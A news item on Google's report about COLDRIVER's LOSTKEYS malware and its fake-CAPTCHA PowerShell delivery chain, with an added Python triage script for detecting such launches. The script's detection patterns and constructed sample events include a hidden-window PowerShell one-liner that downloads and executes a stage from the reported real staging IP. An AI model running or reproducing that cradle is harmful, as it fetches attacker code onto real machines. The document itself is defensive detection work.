COLDRIVER using new malware to steal from Western targets — Google


The malware, LOSTKEYS, can steal files from a hard-coded list of file extensions and directories, according to Google.

Threat group COLDRIVER is using new malware to steal documents from Western targets, according to a May 7 report from Google Threat Intelligence. The malware, called LOSTKEYS, shows the evolution of the group from credential phishing to more sophisticated attacks.

According to the Google report, the new malware is installed through a four-step chain: a “lure website” with a fake CAPTCHA, a PowerShell script placed on the user’s clipboard, a device-evasion stage, and retrieval of the final payload. Lastly, the malware is installed.

LOSTKEYS is capable of stealing files from a hard-coded set of file extensions and directories. It can also send system information and a list of running processes back to COLDRIVER. According to Google, the stages of the attack are served from the address “165.227.148[.]68”.
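The chain described above (fake CAPTCHA, clipboard-delivered PowerShell, later stages fetched from a remote host) leaves a recognisable footprint in process-creation telemetry, because the pasted one-liner runs as a child of the Windows shell rather than of a terminal. The script below is an added example of defender-side triage over such events; it is not Google's or the article's detection logic. The indicator rules, the parent-process heuristic and the sample events are constructed assumptions about how a Run-dialog launch typically appears in Sysmon or EDR data; the only value taken from the article is the staging address, which the example refangs for matching.

```python
"""Heuristic triage of process-creation telemetry for a ClickFix-style chain:
a lure page with a fake CAPTCHA places a PowerShell one-liner on the clipboard,
the victim pastes it into the Run dialog, and the script pulls later stages
from a remote host. Added example, not the article's or Google's own logic;
the rule set and the sample events are constructed assumptions."""

import base64
import re
from dataclasses import dataclass

# Staging address reported in the article (defanged there; refanged for matching).
STAGING_HOST = "165.227.148[.]68".replace("[.]", ".")

# A paste into Win+R launches PowerShell as a child of the shell rather than
# of a terminal or an IDE (assumed generic indicator, not from the article).
RUN_BOX_PARENTS = {"explorer.exe"}

# -EncodedCommand and its short aliases, followed by a base64 blob.
ENCODED_RX = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Command-line markers typical of a clipboard-delivered download cradle.
PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indow(?:style)?)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "download_cradle": re.compile(
        r"(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|webclient|curl)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED_RX.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev):
    """List the indicator names that fire on one event (empty if not PowerShell)."""
    hits = []
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return hits
    if ev.parent_image.lower() in RUN_BOX_PARENTS:
        hits.append("run_box_parent")
    decoded = decode_encoded_command(ev.command_line)
    if decoded:
        hits.append("encoded_command")
    # Scan the raw command line and the decoded payload together so that an
    # encoded cradle is judged by what it does, not by how it is wrapped.
    text = ev.command_line + "\n" + decoded
    for name, rx in PATTERNS.items():
        if rx.search(text):
            hits.append(name)
    if STAGING_HOST in text:
        hits.append("known_staging_host")
    return hits


def triage(events, threshold=3):
    """Return [(index, hits)] for events that reach the threshold or touch the IoC."""
    flagged = []
    for i, ev in enumerate(events):
        hits = score_event(ev)
        if len(hits) >= threshold or "known_staging_host" in hits:
            flagged.append((i, hits))
    return flagged


# Constructed sample events (not real telemetry). The encoded payload is built
# here rather than pasted so the sample is reproducible.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell -w hidden -ep bypass -c iex (iwr http://165.227.148.68/stage2)"),
    ProcessEvent("cmd.exe", "powershell.exe", "powershell Get-ChildItem C:\\logs"),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell -NoProfile -c Get-Date"),
    ProcessEvent("code.exe", "pwsh.exe",
                 "pwsh -c iwr https://example.invalid/tool.zip -OutFile tool.zip"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 f"powershell -nop -w hidden -enc {ENCODED_SAMPLE}"),
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

Two of the five constructed events are flagged: the plain cradle that names the staging host, and the encoded launch whose payload only reveals its download logic after decoding. The benign Run-box launch and the IDE-spawned download stay below the threshold, which is the point of scoring several weak indicators together rather than alerting on any one of them; in production the `known_staging_host` match would also be a candidate for a network-layer block.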
